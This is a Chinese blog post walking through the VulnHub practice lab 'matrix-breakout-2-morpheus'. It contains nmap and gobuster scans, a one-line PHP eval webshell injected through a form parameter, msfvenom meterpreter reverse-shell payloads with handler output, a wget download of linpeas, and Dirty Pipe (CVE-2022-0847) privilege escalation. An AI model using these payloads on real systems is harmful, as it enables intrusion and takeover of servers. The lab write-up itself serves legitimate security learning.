vulnhub靶场:matrix-breakout-2-morpheus

这个靶场的链接不小心给关闭了,所以只能自己去搜了,好像这个靶场需要用virtualbox,但是我的好像有问题,所以用VMware了,这是我打开后的样子

我的kali的ip:192.168.13.129

对靶场进项扫描

nmap -sP 65535 192.168.13.0/24

稍微判断下,锁定在147和254

然后扫描它,发现147是靶场的ip

 

 

gobuster dir -u http://192.168.13.147 -t 40 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

这个是在 渗透笔记:vulnhub靶机drippingblues--第一篇测试记录  中用到的

访问这个ip,好像也没有发现什么

 

 

 

 抓一下包

 

 message=<?php+eval($_POST['CMD']);?>&file=test.php

 用burp没有搞好,用蚁剑了,brup给卡退了,所以没有那个页面了---第二天重新弄的

 

 

 

 

输入https://www.revshells.com/,使用php生成shell反弹脚本---这个也可以,不过我没有用

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.13.129 lport=4444 -f elf -o shell.elf

 

 将shell.elf  放到蚁剑中

 给这个文件增加权限

 用msf生成木马

 ┌──(root㉿kali)-[~]
└─# msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.13.129 lport=4444 -f elf -o shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: shell.elf

 

 

msfconsole

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf6 exploit(multi/handler) > set lhost 192.168.13.147
lhost => 192.168.13.147
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.13.147  yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf6 exploit(multi/handler) > run

 我这个有点太慢了,经历了很多曲折后发现还是有问题,应该是靶机的问题,所以重启,用桥接

 靶机也用了交接

所以现在kali:172.88.6.59

靶机:172.88.6.58

nmap -sP 65535 172.88.6.0/24

nmap -sP --min-hostgroup 1024 --min-parallelism 1024  172.88.6.0/24

这两种扫ip的都行

 

 用MSF生成一个shell.php,

msfvenom -p php/meterpreter/reverse_tcp LHOST=172.88.6.59 LPORT=4444 -f raw > shell2.php

 msfconsole

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost 172.88.6.59
lhost => 172.88.6.59
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) >
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.88.6.59:4444
[*] Sending stage (39927 bytes) to 172.88.6.58
[*] Meterpreter session 1 opened (172.88.6.59:4444 -> 172.88.6.58:57712) at 2023-06-22 13:54:21 +0800

meterpreter > shell
Process 989 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
ls -al
total 456
drwxr-xr-x 2 www-data www-data 4096 Jun 22 05:52 .
drwxr-xr-x 3 root root 4096 Oct 28 2021 ..
-rw-r--r-- 1 www-data www-data 381359 Oct 28 2021 .cypher-neo.png
-rw-r--r-- 1 www-data www-data 770 Oct 28 2021 graffiti.php
-rw-r--r-- 1 www-data www-data 139 Oct 28 2021 graffiti.txt
-rw-r--r-- 1 www-data www-data 348 Oct 28 2021 index.html
-rw-r--r-- 1 www-data www-data 47 Oct 28 2021 robots.txt
-rw-r--r-- 1 www-data www-data 1115 Jun 22 05:27 shell.php
-rw-r--r-- 1 www-data www-data 1112 Jun 22 05:52 shell2.php
-rw-r--r-- 1 www-data www-data 29 Jun 22 05:17 test.php
-rw-r--r-- 1 www-data www-data 44297 Oct 28 2021 trinity.jpeg

 

 

然后shell一下,就出现了上面的,看到其他的博主写的,需要找到FLAG.txt,所以就用蚁剑,由于之前就链接上了,但是重启后ip变了,现在把ip改下就好了,然后用msf生成的shell.php放到蚁剑中,就能和kali链接了,上面是接连到的画面,由于匆忙所以没有那么详(大致过程就是这样),然后用蚁剑找到FLAG.txt

 

 

 在home下面找到的

 利用脚本查找下可以利用的漏洞信息。脚本链接:链接:https://pan.baidu.com/s/1FUd0ohk7rkl-cJR18jkQ0w,提取码:upfn。命令:wget http://172.20.10.7:8000/linpeas.sh,然后赋予执行权限进行执行

我用的是下载完这个脚本,用蚁剑上传

 

 执行脚本后发现存在cve-2022-0847漏洞,这里可以尝试使用该漏洞进行提权,查找下该漏洞的提权方式:https://github.com/imfiver/CVE-2022-0847

把这个脚本下载下来,通过蚁剑上传,上传的名字改了,交“tiquan.sh”

 

 

 这个靶场前面的是不难,就是用msf的时候出现了问题,换了好几个msf的指令,最后在大佬的帮助下才弄好

msf反弹shell - 有牵挂才会怕 - 博客园 (cnblogs.com)

upfine的博客 (cnblogs.com)

Vulnhub靶机笔记2——matrix-breakout-2-morpheus - 飞天井盖 - 博客园 (cnblogs.com)

这是我参考的博主写的,我的太乱了

说下思路把,首先扫描ip,在不确定是那个ip的时候,要么用nmap扫描,要么用浏览器直接登录,这样会页面的就是我们的目标ip,然后用gobuster对ip爆破下,接着用burp抓下包,重点来了,更改下,用一句话链接蚁剑,这个时候就能找到FLAG.txt(主要是我也看别人写的,让我自己找也要一段时间),然后用msf生成一个shell.php,把它放在蚁剑中,然后kali链接,这个地方是我不太懂的,因为链接好几次都是有问题,链接不上,后来换成shell.php才好,然后上脚本查漏洞,我不知道这个脚本是什么(下去后还要好好看看),找到漏洞后进行提权,上传漏洞也是用蚁剑的,给这个文件一个读写的权限,最后bash这个文件就好了。

这个靶场的难点应该是msf吧,用它进行生成文件和提权。

在这里非常感谢以上三位博主和我的朋友,要不然我还要忙一阵子

posted on 2023-06-22 15:02  我还没有吃饭  阅读(341)  评论(0编辑  收藏  举报

导航